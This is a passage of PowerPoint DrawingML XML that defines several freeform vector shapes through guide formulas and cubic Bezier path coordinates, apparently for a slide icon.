                <a:gd name="T19" fmla="*/ 195 h 352"/>
                <a:gd name="T20" fmla="*/ 265 w 315"/>
                <a:gd name="T21" fmla="*/ 157 h 352"/>
                <a:gd name="T22" fmla="*/ 158 w 315"/>
                <a:gd name="T23" fmla="*/ 50 h 352"/>
                <a:gd name="T24" fmla="*/ 108 w 315"/>
                <a:gd name="T25" fmla="*/ 62 h 352"/>
                <a:gd name="T26" fmla="*/ 74 w 315"/>
                <a:gd name="T27" fmla="*/ 52 h 352"/>
                <a:gd name="T28" fmla="*/ 85 w 315"/>
                <a:gd name="T29" fmla="*/ 18 h 352"/>
                <a:gd name="T30" fmla="*/ 158 w 315"/>
                <a:gd name="T31" fmla="*/ 0 h 352"/>
                <a:gd name="T32" fmla="*/ 315 w 315"/>
                <a:gd name="T33" fmla="*/ 157 h 352"/>
                <a:gd name="T34" fmla="*/ 315 w 315"/>
                <a:gd name="T35" fmla="*/ 195 h 352"/>
                <a:gd name="T36" fmla="*/ 158 w 315"/>
                <a:gd name="T3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5" h="352">
                  <a:moveTo>
                    <a:pt x="158" y="352"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="352"/>
                    <a:pt x="0" y="282"/>
                    <a:pt x="0" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="157"/>
                    <a:pt x="0" y="157"/>
                    <a:pt x="0" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="128"/>
                    <a:pt x="8" y="100"/>
                    <a:pt x="24" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="63"/>
                    <a:pt x="46" y="59"/>
                    <a:pt x="58" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="74"/>
                    <a:pt x="74" y="89"/>
                    <a:pt x="66" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="118"/>
                    <a:pt x="50" y="137"/>
                    <a:pt x="50" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="195"/>
                    <a:pt x="50" y="195"/>
                    <a:pt x="50" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="254"/>
                    <a:pt x="99" y="302"/>
                    <a:pt x="158" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="302"/>
                    <a:pt x="265" y="254"/>
                    <a:pt x="265" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="265" y="157"/>
                    <a:pt x="265" y="157"/>
                    <a:pt x="265" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="265" y="98"/>
                    <a:pt x="217" y="50"/>
                    <a:pt x="158" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="50"/>
                    <a:pt x="124" y="54"/>
                    <a:pt x="108" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="69"/>
                    <a:pt x="81" y="64"/>
                    <a:pt x="74" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="39"/>
                    <a:pt x="73" y="24"/>
                    <a:pt x="85" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="6"/>
                    <a:pt x="132" y="0"/>
                    <a:pt x="158" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="0"/>
                    <a:pt x="315" y="71"/>
                    <a:pt x="315" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="195"/>
                    <a:pt x="315" y="195"/>
                    <a:pt x="315" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="282"/>
                    <a:pt x="245" y="352"/>
                    <a:pt x="158" y="3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58" name="Freeform 215">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{194259DA-450D-2842-939C-329999D3A778}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13785851" y="1195388"/>
              <a:ext cx="114300" cy="358775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 180 w 276"/>
                <a:gd name="T1" fmla="*/ 861 h 861"/>
                <a:gd name="T2" fmla="*/ 25 w 276"/>
                <a:gd name="T3" fmla="*/ 861 h 861"/>
                <a:gd name="T4" fmla="*/ 0 w 276"/>
                <a:gd name="T5" fmla="*/ 836 h 861"/>
                <a:gd name="T6" fmla="*/ 25 w 276"/>
                <a:gd name="T7" fmla="*/ 811 h 861"/>
                <a:gd name="T8" fmla="*/ 155 w 276"/>
                <a:gd name="T9" fmla="*/ 811 h 861"/>
                <a:gd name="T10" fmla="*/ 155 w 276"/>
                <a:gd name="T11" fmla="*/ 25 h 861"/>
                <a:gd name="T12" fmla="*/ 180 w 276"/>
                <a:gd name="T13" fmla="*/ 0 h 861"/>
                <a:gd name="T14" fmla="*/ 251 w 276"/>
                <a:gd name="T15" fmla="*/ 0 h 861"/>
                <a:gd name="T16" fmla="*/ 276 w 276"/>
                <a:gd name="T17" fmla="*/ 25 h 861"/>
                <a:gd name="T18" fmla="*/ 251 w 276"/>
                <a:gd name="T19" fmla="*/ 50 h 861"/>
                <a:gd name="T20" fmla="*/ 205 w 276"/>
                <a:gd name="T21" fmla="*/ 50 h 861"/>
                <a:gd name="T22" fmla="*/ 205 w 276"/>
                <a:gd name="T23" fmla="*/ 836 h 861"/>
                <a:gd name="T24" fmla="*/ 180 w 276"/>
                <a:gd name="T25" fmla="*/ 861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861">
                  <a:moveTo>
                    <a:pt x="180" y="861"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="861"/>
                    <a:pt x="25" y="861"/>
                    <a:pt x="25" y="861"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="861"/>
                    <a:pt x="0" y="850"/>
                    <a:pt x="0" y="836"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="822"/>
                    <a:pt x="11" y="811"/>
                    <a:pt x="25" y="811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="811"/>
                    <a:pt x="155" y="811"/>
                    <a:pt x="155" y="811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="25"/>
                    <a:pt x="155" y="25"/>
                    <a:pt x="155" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="11"/>
                    <a:pt x="166" y="0"/>
                    <a:pt x="180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="0"/>
                    <a:pt x="251" y="0"/>
                    <a:pt x="251" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="265" y="0"/>
                    <a:pt x="276" y="11"/>
                    <a:pt x="276" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="39"/>
                    <a:pt x="265" y="50"/>
                    <a:pt x="251" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="50"/>
                    <a:pt x="205" y="50"/>
                    <a:pt x="205" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="836"/>
                    <a:pt x="205" y="836"/>
                    <a:pt x="205" y="836"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="850"/>
                    <a:pt x="194" y="861"/>
                    <a:pt x="180" y="8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59" name="Freeform 216">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCF9AEE1-6A72-A641-8F14-1513593563E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13720764" y="1247776"/>
              <a:ext cx="85725" cy="306388"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 180 w 205"/>
                <a:gd name="T1" fmla="*/ 738 h 738"/>
                <a:gd name="T2" fmla="*/ 25 w 205"/>
                <a:gd name="T3" fmla="*/ 738 h 738"/>
                <a:gd name="T4" fmla="*/ 0 w 205"/>
                <a:gd name="T5" fmla="*/ 713 h 738"/>
                <a:gd name="T6" fmla="*/ 0 w 205"/>
                <a:gd name="T7" fmla="*/ 25 h 738"/>
                <a:gd name="T8" fmla="*/ 25 w 205"/>
                <a:gd name="T9" fmla="*/ 0 h 738"/>
                <a:gd name="T10" fmla="*/ 50 w 205"/>
                <a:gd name="T11" fmla="*/ 25 h 738"/>
                <a:gd name="T12" fmla="*/ 50 w 205"/>
                <a:gd name="T13" fmla="*/ 688 h 738"/>
                <a:gd name="T14" fmla="*/ 155 w 205"/>
                <a:gd name="T15" fmla="*/ 688 h 738"/>
                <a:gd name="T16" fmla="*/ 155 w 205"/>
                <a:gd name="T17" fmla="*/ 255 h 738"/>
                <a:gd name="T18" fmla="*/ 180 w 205"/>
                <a:gd name="T19" fmla="*/ 230 h 738"/>
                <a:gd name="T20" fmla="*/ 205 w 205"/>
                <a:gd name="T21" fmla="*/ 255 h 738"/>
                <a:gd name="T22" fmla="*/ 205 w 205"/>
                <a:gd name="T23" fmla="*/ 713 h 738"/>
                <a:gd name="T24" fmla="*/ 180 w 205"/>
                <a:gd name="T25" fmla="*/ 738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738">
                  <a:moveTo>
                    <a:pt x="180" y="738"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="738"/>
                    <a:pt x="25" y="738"/>
                    <a:pt x="25" y="738"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="738"/>
                    <a:pt x="0" y="727"/>
                    <a:pt x="0" y="713"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="25"/>
                    <a:pt x="0" y="25"/>
                    <a:pt x="0" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="25" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="0"/>
                    <a:pt x="50" y="11"/>
                    <a:pt x="50" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="688"/>
                    <a:pt x="50" y="688"/>
                    <a:pt x="50" y="688"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="688"/>
                    <a:pt x="155" y="688"/>
                    <a:pt x="155" y="688"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="255"/>
                    <a:pt x="155" y="255"/>
                    <a:pt x="155" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="241"/>
                    <a:pt x="166" y="230"/>
                    <a:pt x="180" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="230"/>
                    <a:pt x="205" y="241"/>
                    <a:pt x="205" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="713"/>
                    <a:pt x="205" y="713"/>
                    <a:pt x="205" y="713"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="727"/>
                    <a:pt x="194" y="738"/>
                    <a:pt x="180" y="7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60" name="Freeform 217">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C687330A-1032-464D-9B63-5A980D7821C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13717589" y="1098551"/>
              <a:ext cx="150813" cy="36513"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 362"/>
                <a:gd name="T1" fmla="*/ 86 h 86"/>
                <a:gd name="T2" fmla="*/ 4 w 362"/>
                <a:gd name="T3" fmla="*/ 69 h 86"/>
                <a:gd name="T4" fmla="*/ 20 w 362"/>
                <a:gd name="T5" fmla="*/ 37 h 86"/>
                <a:gd name="T6" fmla="*/ 341 w 362"/>
                <a:gd name="T7" fmla="*/ 32 h 86"/>
                <a:gd name="T8" fmla="*/ 358 w 362"/>
                <a:gd name="T9" fmla="*/ 64 h 86"/>
                <a:gd name="T10" fmla="*/ 327 w 362"/>
                <a:gd name="T11" fmla="*/ 80 h 86"/>
                <a:gd name="T12" fmla="*/ 36 w 362"/>
                <a:gd name="T13" fmla="*/ 84 h 86"/>
                <a:gd name="T14" fmla="*/ 28 w 362"/>
                <a:gd name="T15" fmla="*/ 8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86">
                  <a:moveTo>
                    <a:pt x="28" y="86"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="86"/>
                    <a:pt x="8" y="79"/>
                    <a:pt x="4" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="56"/>
                    <a:pt x="7" y="41"/>
                    <a:pt x="20" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="1"/>
                    <a:pt x="237" y="0"/>
                    <a:pt x="341" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="36"/>
                    <a:pt x="362" y="50"/>
                    <a:pt x="358" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="77"/>
                    <a:pt x="340" y="84"/>
                    <a:pt x="327" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="51"/>
                    <a:pt x="129" y="52"/>
                    <a:pt x="36" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="85"/>
                    <a:pt x="31" y="86"/>
                    <a:pt x="28"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61" name="Freeform 218">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1154FB5-453B-5A41-8CFF-3D96E6938AE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13690601" y="1128713"/>
              <a:ext cx="46038" cy="252413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 88 w 113"/>
                <a:gd name="T1" fmla="*/ 605 h 605"/>
                <a:gd name="T2" fmla="*/ 25 w 113"/>
                <a:gd name="T3" fmla="*/ 605 h 605"/>
                <a:gd name="T4" fmla="*/ 0 w 113"/>
                <a:gd name="T5" fmla="*/ 580 h 605"/>
                <a:gd name="T6" fmla="*/ 0 w 113"/>
                <a:gd name="T7" fmla="*/ 155 h 605"/>
                <a:gd name="T8" fmla="*/ 18 w 113"/>
                <a:gd name="T9" fmla="*/ 20 h 605"/>
                <a:gd name="T10" fmla="*/ 50 w 113"/>
                <a:gd name="T11" fmla="*/ 5 h 605"/>
                <a:gd name="T12" fmla="*/ 65 w 113"/>
                <a:gd name="T13" fmla="*/ 38 h 605"/>
                <a:gd name="T14" fmla="*/ 50 w 113"/>
                <a:gd name="T15" fmla="*/ 155 h 605"/>
                <a:gd name="T16" fmla="*/ 50 w 113"/>
                <a:gd name="T17" fmla="*/ 555 h 605"/>
                <a:gd name="T18" fmla="*/ 88 w 113"/>
                <a:gd name="T19" fmla="*/ 555 h 605"/>
                <a:gd name="T20" fmla="*/ 113 w 113"/>
                <a:gd name="T21" fmla="*/ 580 h 605"/>
                <a:gd name="T22" fmla="*/ 88 w 113"/>
                <a:gd name="T23" fmla="*/ 605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605">
                  <a:moveTo>
                    <a:pt x="88" y="605"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="605"/>
                    <a:pt x="25" y="605"/>
                    <a:pt x="25" y="605"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="605"/>
                    <a:pt x="0" y="594"/>
                    <a:pt x="0" y="580"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="155"/>
                    <a:pt x="0" y="155"/>
                    <a:pt x="0" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="147"/>
                    <a:pt x="0" y="65"/>
                    <a:pt x="18" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="7"/>
                    <a:pt x="37" y="0"/>
                    <a:pt x="50" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="11"/>
                    <a:pt x="70" y="25"/>
                    <a:pt x="65" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="69"/>
                    <a:pt x="50" y="133"/>
                    <a:pt x="50" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="555"/>
                    <a:pt x="50" y="555"/>
                    <a:pt x="50" y="555"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="555"/>
                    <a:pt x="88" y="555"/>
                    <a:pt x="88" y="555"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="555"/>
                    <a:pt x="113" y="567"/>
                    <a:pt x="113" y="580"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="594"/>
                    <a:pt x="102" y="605"/>
                    <a:pt x="88" y="6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62" name="Freeform 219">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA5C473A-725E-8044-8BB3-72D435C5D3F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="14070014" y="1195388"/>
              <a:ext cx="109538" cy="358775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 238 w 263"/>
                <a:gd name="T1" fmla="*/ 861 h 861"/>
                <a:gd name="T2" fmla="*/ 83 w 263"/>
                <a:gd name="T3" fmla="*/ 861 h 861"/>
                <a:gd name="T4" fmla="*/ 58 w 263"/>
                <a:gd name="T5" fmla="*/ 836 h 861"/>
                <a:gd name="T6" fmla="*/ 58 w 263"/>
                <a:gd name="T7" fmla="*/ 50 h 861"/>
                <a:gd name="T8" fmla="*/ 25 w 263"/>
                <a:gd name="T9" fmla="*/ 50 h 861"/>
                <a:gd name="T10" fmla="*/ 0 w 263"/>
                <a:gd name="T11" fmla="*/ 25 h 861"/>
                <a:gd name="T12" fmla="*/ 25 w 263"/>
                <a:gd name="T13" fmla="*/ 0 h 861"/>
                <a:gd name="T14" fmla="*/ 83 w 263"/>
                <a:gd name="T15" fmla="*/ 0 h 861"/>
                <a:gd name="T16" fmla="*/ 108 w 263"/>
                <a:gd name="T17" fmla="*/ 25 h 861"/>
                <a:gd name="T18" fmla="*/ 108 w 263"/>
                <a:gd name="T19" fmla="*/ 811 h 861"/>
                <a:gd name="T20" fmla="*/ 238 w 263"/>
                <a:gd name="T21" fmla="*/ 811 h 861"/>
                <a:gd name="T22" fmla="*/ 263 w 263"/>
                <a:gd name="T23" fmla="*/ 836 h 861"/>
                <a:gd name="T24" fmla="*/ 238 w 263"/>
                <a:gd name="T25" fmla="*/ 861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3" h="861">
                  <a:moveTo>
                    <a:pt x="238" y="861"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="861"/>
                    <a:pt x="83" y="861"/>
                    <a:pt x="83" y="861"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="861"/>
                    <a:pt x="58" y="850"/>
                    <a:pt x="58" y="836"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="50"/>
                    <a:pt x="58" y="50"/>
                    <a:pt x="58" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="50"/>
                    <a:pt x="25" y="50"/>
                    <a:pt x="25" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="50"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="25" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="83" y="0"/>
                    <a:pt x="83" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="0"/>
                    <a:pt x="108" y="11"/>
                    <a:pt x="108" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="811"/>
                    <a:pt x="108" y="811"/>
                    <a:pt x="108" y="811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="811"/>
                    <a:pt x="238" y="811"/>
                    <a:pt x="238" y="811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="811"/>
                    <a:pt x="263" y="822"/>
                    <a:pt x="263" y="836"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="263" y="850"/>
                    <a:pt x="252" y="861"/>
                    <a:pt x="238" y="8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63" name="Freeform 220">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FC23E53-3D00-6B4A-8D62-2B495F5E67A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="14158914" y="1250951"/>
              <a:ext cx="85725" cy="303213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 180 w 205"/>
                <a:gd name="T1" fmla="*/ 728 h 728"/>
                <a:gd name="T2" fmla="*/ 25 w 205"/>
                <a:gd name="T3" fmla="*/ 728 h 728"/>
                <a:gd name="T4" fmla="*/ 0 w 205"/>
                <a:gd name="T5" fmla="*/ 703 h 728"/>
                <a:gd name="T6" fmla="*/ 0 w 205"/>
                <a:gd name="T7" fmla="*/ 245 h 728"/>
                <a:gd name="T8" fmla="*/ 25 w 205"/>
                <a:gd name="T9" fmla="*/ 220 h 728"/>
                <a:gd name="T10" fmla="*/ 50 w 205"/>
                <a:gd name="T11" fmla="*/ 245 h 728"/>
                <a:gd name="T12" fmla="*/ 50 w 205"/>
                <a:gd name="T13" fmla="*/ 678 h 728"/>
                <a:gd name="T14" fmla="*/ 155 w 205"/>
                <a:gd name="T15" fmla="*/ 678 h 728"/>
                <a:gd name="T16" fmla="*/ 155 w 205"/>
                <a:gd name="T17" fmla="*/ 25 h 728"/>
                <a:gd name="T18" fmla="*/ 180 w 205"/>
                <a:gd name="T19" fmla="*/ 0 h 728"/>
                <a:gd name="T20" fmla="*/ 205 w 205"/>
                <a:gd name="T21" fmla="*/ 25 h 728"/>
                <a:gd name="T22" fmla="*/ 205 w 205"/>
                <a:gd name="T23" fmla="*/ 703 h 728"/>
                <a:gd name="T24" fmla="*/ 180 w 205"/>
                <a:gd name="T25" fmla="*/ 728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728">
                  <a:moveTo>
                    <a:pt x="180" y="728"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="728"/>
                    <a:pt x="25" y="728"/>
                    <a:pt x="25" y="728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="728"/>
                    <a:pt x="0" y="717"/>
                    <a:pt x="0" y="703"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="245"/>
                    <a:pt x="0" y="245"/>
                    <a:pt x="0" y="245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="231"/>
                    <a:pt x="11" y="220"/>
                    <a:pt x="25" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="220"/>
                    <a:pt x="50" y="231"/>
                    <a:pt x="50" y="245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="678"/>
                    <a:pt x="50" y="678"/>
                    <a:pt x="50" y="678"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="678"/>
                    <a:pt x="155" y="678"/>
                    <a:pt x="155" y="678"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="25"/>
                    <a:pt x="155" y="25"/>
                    <a:pt x="155" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="11"/>
                    <a:pt x="166" y="0"/>
                    <a:pt x="180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="0"/>
                    <a:pt x="205" y="11"/>
                    <a:pt x="205" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="703"/>
                    <a:pt x="205" y="703"/>
                    <a:pt x="205" y="703"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="717"/>
                    <a:pt x="194" y="728"/>
                    <a:pt x="180" y="7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64" name="Freeform 221">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5856241-6702-694D-90BD-9FC42F8E5E7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="14097001" y="1098551"/>
              <a:ext cx="150813" cy="36513"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 334 w 362"/>
                <a:gd name="T1" fmla="*/ 86 h 86"/>
                <a:gd name="T2" fmla="*/ 325 w 362"/>
                <a:gd name="T3" fmla="*/ 84 h 86"/>
                <a:gd name="T4" fmla="*/ 35 w 362"/>
                <a:gd name="T5" fmla="*/ 80 h 86"/>
                <a:gd name="T6" fmla="*/ 4 w 362"/>
                <a:gd name="T7" fmla="*/ 64 h 86"/>
                <a:gd name="T8" fmla="*/ 20 w 362"/>
                <a:gd name="T9" fmla="*/ 32 h 86"/>
                <a:gd name="T10" fmla="*/ 342 w 362"/>
                <a:gd name="T11" fmla="*/ 37 h 86"/>
                <a:gd name="T12" fmla="*/ 357 w 362"/>
                <a:gd name="T13" fmla="*/ 69 h 86"/>
                <a:gd name="T14" fmla="*/ 334 w 362"/>
                <a:gd name="T15" fmla="*/ 86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2" h="86">
                  <a:moveTo>
                    <a:pt x="334" y="86"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="86"/>
                    <a:pt x="328" y="85"/>
                    <a:pt x="325" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="52"/>
                    <a:pt x="129" y="51"/>
                    <a:pt x="35" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="84"/>
                    <a:pt x="8" y="77"/>
                    <a:pt x="4" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="7" y="36"/>
                    <a:pt x="20" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="0"/>
                    <a:pt x="239" y="1"/>
                    <a:pt x="342" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="41"/>
                    <a:pt x="362" y="56"/>
                    <a:pt x="357" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="79"/>
                    <a:pt x="344" y="86"/>
                    <a:pt x="334"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65" name="Freeform 222">
              <a:extLst>
